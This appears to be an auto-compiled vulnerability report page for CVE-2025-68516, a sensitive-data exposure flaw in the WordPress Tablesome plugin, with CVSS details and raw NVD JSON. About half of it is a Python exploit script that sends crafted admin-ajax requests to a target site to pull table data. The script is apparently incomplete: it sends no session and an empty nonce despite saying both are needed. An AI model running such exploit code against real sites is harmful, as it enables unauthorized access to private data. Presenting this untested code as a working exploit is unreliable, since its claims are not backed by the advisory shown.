Security Vulnerability Report
CVE-2025-68516 CVSS 5.0 MEDIUM

CVE-2025-68516

Published: 2025-12-24 13:16:21
Last Modified: 2026-04-27 19:16:27

Description

Insertion of Sensitive Information Into Sent Data vulnerability in Essekia Tablesome tablesome allows Retrieve Embedded Sensitive Data. This issue affects Tablesome: from n/a through <= 1.1.35.1.

CVSS Details

CVSS Score: 5.0
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Tablesome plugin <= 1.1.35.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import sys

# CVE-2025-68516 PoC - WordPress Tablesome Sensitive Data Exposure
# Target: WordPress site with Tablesome plugin <= 1.1.35.1


def exploit_tablesome(target_url, table_id):
    """
    Exploit for CVE-2025-68516: Tablesome Plugin Sensitive Data Exposure

    Description: The Tablesome plugin allows low-privileged users to retrieve
    embedded sensitive data through improper access control.

    This PoC demonstrates how an authenticated user with low privileges
    can access sensitive data from tables they should not have access to.
    """
    # Target endpoint for tablesome data retrieval
    endpoint = f"{target_url}/wp-admin/admin-ajax.php"

    # Construct malicious request to retrieve sensitive data
    payload = {
        'action': 'tablesome_get_table_data',
        'table_id': table_id,
        'nonce': '',  # Requires valid nonce from the page
        'post_id': 0
    }

    headers = {
        'Content-Type': 'application/x-www-form-urlencoded',
        'X-Requested-With': 'XMLHttpRequest'
    }

    try:
        # Send request with low-privilege user session
        response = requests.post(endpoint, data=payload, headers=headers, timeout=10)

        if response.status_code == 200:
            data = response.json()
            if 'data' in data and data['data']:
                print(f"[+] Success! Sensitive data retrieved from table {table_id}")
                print(f"[+] Data: {data['data']}")
                return True
            else:
                print(f"[-] No sensitive data found or access denied")
                return False
        else:
            print(f"[-] Request failed with status: {response.status_code}")
            return False
    except requests.exceptions.RequestException as e:
        print(f"[-] Connection error: {e}")
        return False


if __name__ == "__main__":
    if len(sys.argv) < 3:
        print(f"Usage: python {sys.argv[0]} <target_url> <table_id>")
        print(f"Example: python {sys.argv[0]} http://example.com 123")
        sys.exit(1)

    target = sys.argv[1]
    table_id = sys.argv[2]

    print(f"[*] Targeting: {target}")
    print(f"[*] Attempting to exploit CVE-2025-68516...")
    exploit_tablesome(target, table_id)
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68516", "sourceIdentifier": "[email protected]", "published": "2025-12-24T13:16:21.270", "lastModified": "2026-04-27T19:16:27.190", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Insertion of Sensitive Information Into Sent Data vulnerability in Essekia Tablesome tablesome allows Retrieve Embedded Sensitive Data.This issue affects Tablesome: from n/a through <= 1.1.35.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N", "baseScore": 5.0, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-201"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/tablesome/vulnerability/wordpress-tablesome-plugin-1-1-35-1-sensitive-data-exposure-vulnerability?_s_id=cve", "source": "[email protected]"}]}}